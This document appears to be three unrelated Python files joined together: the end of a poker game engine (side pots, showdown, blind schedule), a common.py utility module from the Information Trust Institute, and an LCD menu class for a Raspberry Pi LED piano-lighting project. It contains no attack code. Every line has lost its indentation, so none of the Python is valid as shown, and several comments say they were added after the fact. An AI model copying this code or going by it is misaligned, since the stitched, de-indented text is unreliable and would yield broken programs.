if player.carry_over>0:
next_pot_players.append(player)
else:
if player in pots[-1].active_players:
pots[-1].active_players.remove(player)
print (str(player.name))
print ('refund...'+str(refund))
#create side pots _________________________________________________
if create_side_pot:
sidepot=Side_pot(pot)
for player in next_pot_players:
sidepot.players.append(player)
sidepot.total+=player.carry_over
player.in_pot+=player.carry_over
player.stack-=player.carry_over
if player.stack>0:
player.first_all_in=False
player.all_in=False
pots[-1].active_players.append(player)
pots.append(sidepot)
#print out pot totals at the end of the round______________________________
for pot in pots:
print (str(pot.name))
pot.to_play=0
print ('pot size= '+str(pot.total))
#zero the player cash in the pot
for player in pot.players:
player.in_pot=0
player.stake=0
player.raised=0
#reset various pot variables for next betting round
pots[0].no_raise=0
pots[0].to_play=0
pots[0].turn=0
pots[0].stage+=1
pots[0].already_bet=False
pots[0].limpers=0
def showdown(pot):
scoring=[]
if pot.one_remaining:
for player in pot.players:
if player.is_folded==False:
print (str(player.name)+' wins'+str(pot.total))
player.stack+=pot.total
else:
for player in pot.players:
if player.is_folded==False:
player.get_value()
scoring.append(player)
#rank hands in value+tie break order
scoring.sort(key=attrgetter('hand_value', 'tie_break'), reverse=True)
split_pot=[]
print ('\n\n\n')
for player in scoring:
if player.stratname!='Human':
player.flip()
player.print_cards()
print (player.name+' has '+str(player.rep))
#check for split pot
split_stake=0
split=False
for player in scoring[1:]:
if player.hand_value==scoring[0].hand_value and player.tie_break==scoring[0].tie_break:
split=True
split_pot.append(scoring[0])
split_pot.append(player)
if split:
print ('split pot')
split_stake=int((pot.total/(len(split_pot))))
for player in split_pot:
print (str(player.name)+' wins '+str(split_stake))
player.stack+=split_stake
else:
scoring[0].stack+=pot.total
print (str(scoring[0].name)+' wins '+str(pot.total))
#_______________________________________________________________________gameplay
######################
#set up the game and players
status='setup'
BLINDS=[10,20]
player6=Hand('Alex', table, s, 'SklanskySys2')  # pass the websocket server so 'SklanskySys2' is used as the strategy
deck=Deck()
while status == 'setup':
if (players.keys().__len__()) == 1:
status = 'play'
status='play'
#for i in range (0,2):
pots=[]
while status=='play':
#increment the table hand#
print('hi')
#shuffle the deck
deck.populate()
deck.shuffle()
#create pot for this hand
pot=Pot(table, 'main')
for player in table.players:
pot.players.append(player)
pot.active_players.append(player)
pots.append(pot)
#allocate blinds and ante up
pot.set_blinds()
print ('Hand#'+str(table.hands))
print ('Blinds: '+str(BLINDS))
ante_up(pot)
#debug(pot)
#table.print_players()
while pot.stage<4:
deck.deal_to(table, Pot.deal_sequence[pot.stage], True)
print (str(Pot.stage_dict[pot.stage]))
table.print_cards()
betting_round(pots[-1], table)
#table.print_players()
if len(table.players)>1:
for pot in pots:
showdown(pot)
table.hands+=1
table.blinds_timer=table.hands%6
if table.blinds_timer==5:
BLINDS[:] = [x*2 for x in BLINDS]
for player in table.players[:]:
print (player.name, player.stack, BLINDS[1])
if player.stack<=BLINDS[1]:
player.bust()
if len(table.players)==1:
status='winner'
print ('\n\n\n')
next_hand(table, deck)
for player in table.players:
print (str(player.name)+' wins the game')
print(debug(pot))
|
common.py
|
# # # # #
# common.py
#
# Contains methods used across
# multiple backend files
#
# University of Illinois/NCSA Open Source License
# Copyright (c) 2015 Information Trust Institute
# All rights reserved.
#
# Developed by:
#
# Information Trust Institute
# University of Illinois
# http://www.iti.illinois.edu
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal with
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# Redistributions of source code must retain the above copyright notice, this list
# of conditions and the following disclaimers. Redistributions in binary form must
# reproduce the above copyright notice, this list of conditions and the following
# disclaimers in the documentation and/or other materials provided with the
# distribution.
#
# Neither the names of Information Trust Institute, University of Illinois, nor
# the names of its contributors may be used to endorse or promote products derived
# from this Software without specific prior written permission.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE CONTRIBUTORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH THE SOFTWARE.
#
# # # # #
from datetime import datetime
from subprocess import check_output
import json
import threading
def getCurrentTimestampAsStr():
return str(datetime.now())
def getTemplateAsString(pathToTemplate):
with open(pathToTemplate, "r") as temp:
tString = temp.read()
return tString
def getPocPhoneNumber():
return "(555) 123-4567 (Test Number Only)"
def getLocation():
return "Olympus Mons (Test Location Only)"
def getDescription():
return "Winter getaway, snowfall rare (Test Description Only)"
def getJsonStrUnformatted(inputDict):
return json.loads(json.JSONEncoder().encode(inputDict))
def getJsonStrFormatted(inputDict):
return json.dumps(getJsonStrUnformatted(inputDict), sort_keys=True, indent=4)
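# Illustrative usage (added note, not part of the original file): getJsonStrUnformatted()
# round-trips a dict through the JSON encoder and returns a plain Python object, while
# getJsonStrFormatted() renders it as an indented, key-sorted string, e.g.
#     getJsonStrFormatted({'b': 1, 'a': 2})  ->  '{\n    "a": 2,\n    "b": 1\n}'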
def monToNum(mon):
return {
'Jan': 1,
'Feb': 2,
'Mar': 3,
'Apr': 4,
'May': 5,
'Jun': 6,
'Jul': 7,
'Aug': 8,
'Sep': 9,
'Oct': 10,
'Nov': 11,
'Dec': 12,
}[mon]
def toTimestamp(mon, day, hh, mm, ss, year=None):
today = datetime.today()
if year == None:
year = today.year
if mon > today.month:
year -= 1
return datetime(year, mon, day, hh, mm, ss).timestamp()
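# Note (added for clarity, not in the original file): when the year is omitted,
# toTimestamp() defaults it to the current year, and the month-ahead check rolls it
# back by one year -- so, for example, a "Dec 31" entry parsed in January is
# attributed to the previous December rather than a date in the future.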
def cmd(command, isShell=False):
return check_output(command.split(' '), shell=isShell).decode('utf-8')
def timestampToPrettyDate(timestamp):
return datetime.fromtimestamp(timestamp).strftime('%Y/%m/%d %H:%M:%S')
def getFileType(theFile):
return cmd('file ' + theFile).split(': ')[1]
def startNewThread(method, args=()):
t = threading.Thread(target=method, args=args)
t.start()
def getKeysByValue(inpDict, value):
return [k for k,v in inpDict.items() if v == value]
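# Illustrative usage (added note, not part of the original file):
#     getKeysByValue({'eth0': 'up', 'eth1': 'down', 'lo': 'up'}, 'up')  ->  ['eth0', 'lo']
# (dict insertion order is preserved in Python 3.7+, so the result order follows it).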
|
menulcd.py
|
import os
from subprocess import call
from xml.dom import minidom
from lib.ledsettings import LedSettings
import webcolors as wc
from PIL import ImageFont, Image, ImageDraw
import LCD_1in3
import LCD_1in44
import LCD_Config
from lib.functions import *
import RPi.GPIO as GPIO
class MenuLCD:
def __init__(self, xml_file_name, args, usersettings, ledsettings, ledstrip, learning, saving, midiports):
self.usersettings = usersettings
self.ledsettings = ledsettings
self.ledstrip = ledstrip
self.learning = learning
self.saving = saving
self.midiports = midiports
fontdir = "/usr/share/fonts/truetype/freefont"
if args.fontdir != None:
fontdir = args.fontdir
self.lcd_ttf = fontdir + "/FreeSansBold.ttf"
if not os.path.exists(self.lcd_ttf):
raise RuntimeError("Cannot locate font file: %s" % self.lcd_ttf)
if args.display == '1in3':
self.LCD = LCD_1in3.LCD()
self.font = ImageFont.truetype(fontdir + '/FreeMonoBold.ttf', self.scale(10))
self.image = Image.open('webinterface/static/logo240_240.bmp')
else:
self.LCD = LCD_1in44.LCD()
self.font = ImageFont.load_default()
self.image = Image.open('webinterface/static/logo128_128.bmp')
self.LCD.LCD_Init()
self.LCD.LCD_ShowImage(self.image, 0, 0)
self.DOMTree = minidom.parse(xml_file_name)
self.currentlocation = "menu"
self.scroll_hold = 0
self.cut_count = 0
self.pointer_position = 0
self.background_color = usersettings.get_setting_value("background_color")
self.text_color = usersettings.get_setting_value("text_color")
self.update_songs()
self.update_ports()
self.update_led_note_offsets()
self.speed_multiplier = 1
self.screensaver_settings = dict()
self.screensaver_settings['time'] = usersettings.get_setting_value("time")
self.screensaver_settings['date'] = usersettings.get_setting_value("date")
self.screensaver_settings['cpu_chart'] = usersettings.get_setting_value("cpu_chart")
self.screensaver_settings['cpu'] = usersettings.get_setting_value("cpu")
self.screensaver_settings['ram'] = usersettings.get_setting_value("ram")
self.screensaver_settings['temp'] = usersettings.get_setting_value("temp")
self.screensaver_settings['network_usage'] = usersettings.get_setting_value("network_usage")
self.screensaver_settings['sd_card_space'] = usersettings.get_setting_value("sd_card_space")
self.screensaver_settings['local_ip'] = usersettings.get_setting_value("local_ip")
self.screensaver_delay = usersettings.get_setting_value("screensaver_delay")
self.screen_off_delay = usersettings.get_setting_value("screen_off_delay")
self.led_animation_delay = usersettings.get_setting_value("led_animation_delay")
self.led_animation = usersettings.get_setting_value("led_animation")
self.screen_on = usersettings.get_setting_value("screen_on")
self.screen_status = 1
self.screensaver_is_running = False
def toggle_screensaver_settings(self, setting):
setting = setting.lower()
setting = setting.replace(" ", "_")
if str(self.screensaver_settings[setting]) == "1":
self.usersettings.change_setting_value(setting, "0")
self.screensaver_settings[setting] = "0"
else:
self.usersettings.change_setting_value(setting, "1")
self.screensaver_settings[setting] = "1"
def update_songs(self):
# Assume the first node is "Choose song"
replace_node = self.DOMTree.getElementsByTagName("Play_MIDI")[0]
choose_song_mc = self.DOMTree.createElement("Play_MIDI")
choose_song_mc.appendChild(self.DOMTree.createTextNode(""))
choose_song_mc.setAttribute("text", "Choose song")
replace_node.parentNode.replaceChild(choose_song_mc, replace_node)
# Assume the first node is "Load song"
replace_node = self.DOMTree.getElementsByTagName("Learn_MIDI")[0]
load_song_mc = self.DOMTree.createElement("Learn_MIDI")
load_song_mc.appendChild(self.DOMTree.createTextNode(""))
load_song_mc.setAttribute("text", "Load song")
replace_node.parentNode.replaceChild(load_song_mc, replace_node)
songs_list = os.listdir("Songs")
for song in songs_list:
# List of songs for Play_MIDI
element = self.DOMTree.createElement("Choose_song")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", song)
choose_song_mc.appendChild(element)
# List of songs for Learn_MIDI
element = self.DOMTree.createElement("Load_song")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", song)
load_song_mc.appendChild(element)
def update_sequence_list(self):
seq_mc = self.DOMTree.createElement("LED_Strip_Settings")
seq_mc.appendChild(self.DOMTree.createTextNode(""))
seq_mc.setAttribute("text", "Sequences")
mc = self.DOMTree.getElementsByTagName("Sequences")[0]
mc.parentNode.parentNode.replaceChild(seq_mc, mc.parentNode)
ret = True
try:
sequences_tree = minidom.parse("sequences.xml")
self.update_songs()
i = 0
while True:
try:
i += 1
sequence_name = \
sequences_tree.getElementsByTagName("sequence_" + str(i))[0].getElementsByTagName(
"sequence_name")[
0].firstChild.nodeValue
element = self.DOMTree.createElement("Sequences")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", str(sequence_name))
seq_mc.appendChild(element)
except:
break
except:
ret = False
element = self.DOMTree.createElement("Sequences")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Update")
seq_mc.appendChild(element)
return ret
def update_ports(self):
ports = mido.get_input_names()
ports = list(dict.fromkeys(ports))
self.update_sequence_list()
# Replace Input and Playback with empty elements
element = self.DOMTree.createElement("Ports_Settings")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Input")
mc = self.DOMTree.getElementsByTagName("Ports_Settings")[0]
mc.parentNode.replaceChild(element, mc)
element = self.DOMTree.createElement("Ports_Settings")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Playback")
mc = self.DOMTree.getElementsByTagName("Ports_Settings")[1]
mc.parentNode.replaceChild(element, mc)
for port in ports:
element = self.DOMTree.createElement("Input")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", port)
mc = self.DOMTree.getElementsByTagName("Ports_Settings")[0]
mc.appendChild(element)
element = self.DOMTree.createElement("Playback")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", port)
mc = self.DOMTree.getElementsByTagName("Ports_Settings")[1]
mc.appendChild(element)
def update_led_note_offsets(self):
note_offsets = self.ledsettings.note_offsets
mc = self.DOMTree.getElementsByTagName("LED_Note_Offsets")[0]
mc_note_offsets = self.DOMTree.createElement("LED_Strip_Settings")
mc_note_offsets.appendChild(self.DOMTree.createTextNode(""))
mc_note_offsets.setAttribute("text", "LED Note Offsets")
parent = mc.parentNode.parentNode
parent.replaceChild(mc_note_offsets, mc.parentNode)
element = self.DOMTree.createElement("LED_Note_Offsets")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Add Note Offset")
mc_note_offsets.appendChild(element)
i = 0
for note_offset in note_offsets:
i += 1
element = self.DOMTree.createElement("LED_Note_Offsets")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Offset%s" % i)
mc_note_offsets.appendChild(element)
op_element = self.DOMTree.createElement("Offset%s" % i)
op_element.appendChild(self.DOMTree.createTextNode(""))
op_element.setAttribute("text", "LED Number")
element.appendChild(op_element)
op_element = self.DOMTree.createElement("Offset%s" % i)
op_element.appendChild(self.DOMTree.createTextNode(""))
op_element.setAttribute("text", "LED Offset")
element.appendChild(op_element)
op_element = self.DOMTree.createElement("Offset%s" % i)
op_element.appendChild(self.DOMTree.createTextNode(""))
op_element.setAttribute("text", "Delete")
element.appendChild(op_element)
if i > 0:
element = self.DOMTree.createElement("LED_Note_Offsets")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Append Note Offset")
mc_note_offsets.appendChild(element)
def update_multicolor(self, colors_list):
i = 0
self.update_ports()
rgb_names = ["Red", "Green", "Blue"]
mc = self.DOMTree.getElementsByTagName("Multicolor")[0]
mc_multicolor = self.DOMTree.createElement("LED_Color")
mc_multicolor.appendChild(self.DOMTree.createTextNode(""))
mc_multicolor.setAttribute("text", "Multicolor")
parent = mc.parentNode.parentNode
parent.replaceChild(mc_multicolor, mc.parentNode)
for color in colors_list:
i = i + 1
element = self.DOMTree.createElement("Multicolor")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Color" + str(i))
#mc = self.DOMTree.getElementsByTagName("LED_Color")[0]
mc_multicolor.appendChild(element)
element = self.DOMTree.createElement("Color" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "RGB Color" + str(i))
mc = self.DOMTree.getElementsByTagName("Multicolor")[0]
mc.appendChild(element)
# adding key range to menu
element = self.DOMTree.createElement("Color" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Key range" + str(i))
mc = self.DOMTree.getElementsByTagName("Multicolor")[0]
mc.appendChild(element)
element = self.DOMTree.createElement("Key_range" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Start")
mc = self.DOMTree.getElementsByTagName("Color" + str(i))[0]
mc.appendChild(element)
element = self.DOMTree.createElement("Key_range" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "End")
mc = self.DOMTree.getElementsByTagName("Color" + str(i))[0]
mc.appendChild(element)
# adding delete
element = self.DOMTree.createElement("Color" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Delete")
mc = self.DOMTree.getElementsByTagName("Multicolor")[0]
mc.appendChild(element)
for rgb_name in rgb_names:
element = self.DOMTree.createElement("RGB_Color" + str(i))
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", rgb_name)
mc = self.DOMTree.getElementsByTagName("Color" + str(i))[0]
mc.appendChild(element)
# Add in the "Add Color" and "Confirm" into the replaced child
element = self.DOMTree.createElement("Multicolor")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Add Color")
mc_multicolor.appendChild(element)
element = self.DOMTree.createElement("Multicolor")
element.appendChild(self.DOMTree.createTextNode(""))
element.setAttribute("text", "Confirm")
mc_multicolor.appendChild(element)
def scale(self, size):
return int(round(size * self.LCD.font_scale))
def disable_screen(self):
GPIO.output(24, 0)
self.screen_on = 0
self.usersettings.change_setting_value("screen_on", 0)
def enable_screen(self):
GPIO.output(24, 1)
self.screen_on = 1
self.usersettings.change_setting_value("screen_on", 1)
def show(self, position="default", back_pointer_location=False):
if self.screen_on == 0:
return False
if position == "default" and self.currentlocation:
position = self.currentlocation
refresh = 1
elif position == "default" and not self.currentlocation:
position = "menu"
refresh = 1
else:
position = position.replace(" ", "_")
self.currentlocation = position
refresh = 0
self.image = Image.new("RGB", (self.LCD.width, self.LCD.height), self.background_color)
self.draw = ImageDraw.Draw(self.image)
self.draw.text((self.scale(2), self.scale(5)), position.replace("_", " "), fill=self.text_color, font=self.font)
# getting list of items in current menu
staffs = self.DOMTree.getElementsByTagName(position)
text_margin_top = self.scale(15)
i = 0
list_count = len(staffs)
list_count -= 1
if self.pointer_position > 9:
menu_offset = self.pointer_position - 9
else:
menu_offset = -1
# looping through menu list
for staff in staffs:
self.pointer_position = clamp(self.pointer_position, 0, list_count)
# drawing little arrow to show there are more items above
if self.pointer_position > 9 and i < menu_offset:
self.draw.line(
[
(self.scale(119), self.scale(20)),
(self.scale(125), self.scale(20))
],
fill=self.text_color,
width=(self.scale(2))
)
self.draw.line(
[
(self.scale(119), self.scale(20)),
(self.scale(122), self.scale(17))
],
fill=self.text_color,
width=(self.scale(2))
)
self.draw.line(
[
(self.scale(119), self.scale(20)),
(self.scale(122), self.scale(17))
],
fill=self.text_color,
width=(self.scale(2))
)
i += 1
continue
sid = staff.getAttribute("text")
if not back_pointer_location:
if i == self.pointer_position:
try:
self.parent_menu = staff.parentNode.tagName
except:
self.parent_menu = "end"
self.draw.rectangle(
[
(0, text_margin_top),
(self.LCD.width, text_margin_top + self.scale(11))
],
fill="Crimson"
)
self.draw.text((self.scale(3), text_margin_top), ">", fill=self.text_color, font=self.font)
self.current_choice = sid
else:
if sid == back_pointer_location:
try:
self.parent_menu = staff.parentNode.tagName
except:
self.parent_menu = "data"
self.draw.rectangle([(0, text_margin_top), (self.LCD.width, text_margin_top + self.scale(11))],
fill="Crimson")
self.draw.text((self.scale(3), text_margin_top), ">", fill=self.text_color, font=self.font)
self.current_choice = sid
self.pointer_position = i
# drawing little arrow to show there are more items below
if i == 10 and self.pointer_position < list_count and list_count > 10:
self.draw.line(
[
(self.scale(119), self.scale(120)),
(self.scale(125), self.scale(120))
],
fill=self.text_color,
width=(self.scale(2))
)
self.draw.line(
[
(self.scale(119), self.scale(120)),
(self.scale(122), self.scale(123))
],
fill=self.text_color,
width=(self.scale(2))
)
self.draw.line(
[
(self.scale(122), self.scale(123)),
(self.scale(125), self.scale(120))
],
fill=self.text_color,
width=(self.scale(2))
)
# scrolling text if too long
if self.pointer_position == i and len(sid) > 18:
tobecontinued = ".."
if refresh == 1:
try:
self.cut_count += 1
except:
self.cut_count = -6
else:
cut = 0
self.cut_count = -6
if self.cut_count > (len(sid) - 16):
# hold scrolling on end
if self.scroll_hold < 8:
self.cut_count -= 1
self.scroll_hold += 1
tobecontinued = ""
else:
self.cut_count = -6
self.scroll_hold = 0
cut = self.cut_count
if self.cut_count >= 0:
cut = self.cut_count
else:
cut = 0
else:
cut = 0
tobecontinued = ""
i += 1
# displaying screensaver status
if self.currentlocation == "Content":
sid_temp = sid.lower()
sid_temp = sid_temp.replace(" ", "_")
if str(self.screensaver_settings[sid_temp]) == "1":
sid_temp = " +"
else:
sid_temp = " -"
sid = sid + sid_temp
self.draw.text((self.scale(10), text_margin_top), sid[cut:(18 + cut)] + tobecontinued, fill=self.text_color,
font=self.font)
text_margin_top += self.scale(10)
# displaying color example
if self.currentlocation == "RGB":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.get_colors()), fill=self.text_color,
font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(self.ledsettings.get_colors()) + ")")
if "RGB_Color" in self.currentlocation:
self.draw.text((self.scale(10), self.scale(70)),
str(self.ledsettings.get_multicolors(self.currentlocation.replace('RGB_Color', ''))),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)], fill="rgb(" + str(
self.ledsettings.get_multicolors(self.currentlocation.replace('RGB_Color', ''))) + ")")
if "Backlight_Color" in self.currentlocation:
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.get_backlight_colors()),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(self.ledsettings.get_backlight_colors()) + ")")
if "Custom_RGB" in self.currentlocation:
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.get_adjacent_colors()),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(self.ledsettings.get_adjacent_colors()) + ")")
if "Multicolor" in self.currentlocation:
try:
self.draw.rectangle([(self.scale(115), self.scale(50)), (self.LCD.width, self.scale(80))],
fill="rgb(" + str(
self.ledsettings.get_multicolors(self.current_choice.replace('Color', ''))) + ")")
except:
pass
if "Color_for_slow_speed" in self.currentlocation:
red = self.ledsettings.speed_slowest["red"]
green = self.ledsettings.speed_slowest["green"]
blue = self.ledsettings.speed_slowest["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
if "Color_for_fast_speed" in self.currentlocation:
red = self.ledsettings.speed_fastest["red"]
green = self.ledsettings.speed_fastest["green"]
blue = self.ledsettings.speed_fastest["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
if "Gradient_start" in self.currentlocation:
red = self.ledsettings.gradient_start["red"]
green = self.ledsettings.gradient_start["green"]
blue = self.ledsettings.gradient_start["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
if "Gradient_end" in self.currentlocation:
red = self.ledsettings.gradient_end["red"]
green = self.ledsettings.gradient_end["green"]
blue = self.ledsettings.gradient_end["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
if "Color_in_scale" in self.currentlocation:
red = self.ledsettings.key_in_scale["red"]
green = self.ledsettings.key_in_scale["green"]
blue = self.ledsettings.key_in_scale["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
if "Color_not_in_scale" in self.currentlocation:
red = self.ledsettings.key_not_in_scale["red"]
green = self.ledsettings.key_not_in_scale["green"]
blue = self.ledsettings.key_not_in_scale["blue"]
self.draw.text((self.scale(10), self.scale(70)), str(red) + ", " + str(green) + ", " + str(blue),
fill=self.text_color, font=self.font)
self.draw.rectangle([(self.scale(0), self.scale(80)), (self.LCD.width, self.LCD.height)],
fill="rgb(" + str(red) + ", " + str(green) + ", " + str(blue) + ")")
# displaying rainbow offset value
if self.current_choice == "Offset":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.rainbow_offset), fill=self.text_color,
font=self.font)
if self.current_choice == "Scale":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.rainbow_scale) + "%",
fill=self.text_color,
font=self.font)
if self.current_choice == "Timeshift":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.rainbow_timeshift),
fill=self.text_color,
font=self.font)
# displaying brightness value
if self.currentlocation == "Brightness":
self.draw.text((self.scale(10), self.scale(35)), str(self.ledstrip.brightness_percent) + "%",
fill=self.text_color, font=self.font)
miliamps = int(self.ledstrip.LED_COUNT) * (60 / (100 / float(self.ledstrip.brightness_percent)))
amps = round(float(miliamps) / float(1000), 2)
self.draw.text((self.scale(10), self.scale(50)), "Amps needed to " + "\n" + "power " + str(
self.ledstrip.LED_COUNT) + " LEDS with " + "\n" + "white color: " + str(amps), fill=self.text_color,
font=self.font)
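# Worked example (added for clarity; the figures are illustrative, not from the source):
# the estimate above assumes roughly 60 mA per LED at full white, scaled by the
# brightness percentage -- e.g. 176 LEDs at 50% brightness give
# 176 * (60 / (100 / 50)) = 5280 mA, shown as 5.28 A.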
if self.currentlocation == "Backlight_Brightness":
self.draw.text((self.scale(10), self.scale(35)), str(self.ledsettings.backlight_brightness_percent) + "%",
fill=self.text_color, font=self.font)
# displaying led count
if self.currentlocation == "Led_count":
self.draw.text((self.scale(10), self.scale(35)), str(self.ledstrip.led_number), fill=self.text_color,
font=self.font)
# displaying shift
if self.currentlocation == "Shift":
self.draw.text((self.scale(10), self.scale(35)), str(self.ledstrip.shift), fill=self.text_color,
font=self.font)
# displaying reverse
if self.currentlocation == "Reverse":
self.draw.text((self.scale(10), self.scale(35)), str(self.ledstrip.reverse), fill=self.text_color,
font=self.font)
if self.current_choice == "LED Number" and self.currentlocation.startswith("Offset"):
try:
self.draw.text((self.scale(10), self.scale(50)), str(
self.ledsettings.note_offsets[int(self.currentlocation.replace('Offset', '')) - 1][0]),
fill=self.text_color, font=self.font)
except:
pass
if self.current_choice == "LED Offset" and self.currentlocation.startswith("Offset"):
try:
self.draw.text((self.scale(10), self.scale(50)), str(
self.ledsettings.note_offsets[int(self.currentlocation.replace('Offset', '')) - 1][1]),
fill=self.text_color, font=self.font)
except:
pass
if "Key_range" in self.currentlocation:
if self.current_choice == "Start":
try:
self.draw.text((self.scale(10), self.scale(50)), str(
self.ledsettings.multicolor_range[int(self.currentlocation.replace('Key_range', '')) - 1][0]),
fill=self.text_color, font=self.font)
except:
pass
else:
self.draw.text((self.scale(10), self.scale(50)), str(
self.ledsettings.multicolor_range[int(self.currentlocation.replace('Key_range', '')) - 1][1]),
fill=self.text_color, font=self.font)
# displaying screensaver settings
if self.currentlocation == "Start_delay":
self.draw.text((self.scale(10), self.scale(70)), str(self.screensaver_delay), fill=self.text_color,
font=self.font)
if self.currentlocation == "Turn_off_screen_delay":
self.draw.text((self.scale(10), self.scale(70)), str(self.screen_off_delay), fill=self.text_color,
font=self.font)
if self.currentlocation == "Led_animation_delay":
self.draw.text((self.scale(10), self.scale(70)), str(self.led_animation_delay), fill=self.text_color,
font=self.font)
# displaying speed values
if self.currentlocation == "Period":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.speed_period_in_seconds),
fill=self.text_color, font=self.font)
if self.currentlocation == "Max_notes_in_period":
self.draw.text((self.scale(10), self.scale(70)), str(self.ledsettings.speed_max_notes), fill=self.text_color,
font=self.font)
# displaying scale key
if self.currentlocation == "Scale_Coloring":
self.draw.text((self.scale(10), self.scale(70)), "scale: " + str(
self.ledsettings.scales[self.ledsettings.scale_key]),
fill=self.text_color, font=self.font)
# Learn MIDI
if self.currentlocation == "Learn_MIDI":
# Position 1: display Load song
self.draw.text((self.scale(90), self.scale(5 + 10)), str(self.learning.loadingList[self.learning.loading]),
fill=self.text_color, font=self.font)
# Position 2: display Learning Start/Stop
self.draw.text((self.scale(90), self.scale(5 + 20)), str(
self.learning.learningList[self.learning.is_started_midi]),
fill=self.text_color, font=self.font)
# Position 3: display Practice
self.draw.text((self.scale(90), self.scale(5 + 30)), str(
self.learning.practiceList[self.learning.practice]),
fill=self.text_color, font=self.font)
# Position 4: display Hands
self.draw.text((self.scale(90), self.scale(5 + 40)), str(self.learning.handsList[self.learning.hands]),
fill=self.text_color, font=self.font)
# Position 5: display Mute hand
self.draw.text((self.scale(90), self.scale(5 + 50)), str(
self.learning.mute_handList[self.learning.mute_hand]),
fill=self.text_color, font=self.font)
# Position 6: display Start point
self.draw.text((self.scale(90), self.scale(5 + 60)), str(self.learning.start_point) + "%",
fill=self.text_color,
font=self.font)
# Position 7: display End point
self.draw.text((self.scale(90), self.scale(5 + 70)), str(self.learning.end_point) + "%",
fill=self.text_color,
font=self.font)
# Position 8: display Set tempo
self.draw.text((self.scale(90), self.scale(5 + 80)), str(self.learning.set_tempo) + "%",
fill=self.text_color,
font=self.font)
# Position 9,10: display Hands colors
coordR = 7 + 90
coordL = 7 + 100
self.draw.rectangle([(self.scale(90), self.scale(coordR)), (self.LCD.width, self.scale(coordR + 7))],
fill="rgb(" + str(self.learning.hand_colorList[self.learning.hand_colorR])[1:-1] + ")")
self.draw.rectangle([(self.scale(90), self.scale(coordL)), (self.LCD.width, self.scale(coordL + 7))],
fill="rgb(" + str(self.learning.hand_colorList[self.learning.hand_colorL])[1:-1] + ")")
self.LCD.LCD_ShowImage(self.image, 0, 0)
def change_pointer(self, direction):
if direction == 0:
self.pointer_position -= 1
elif direction == 1:
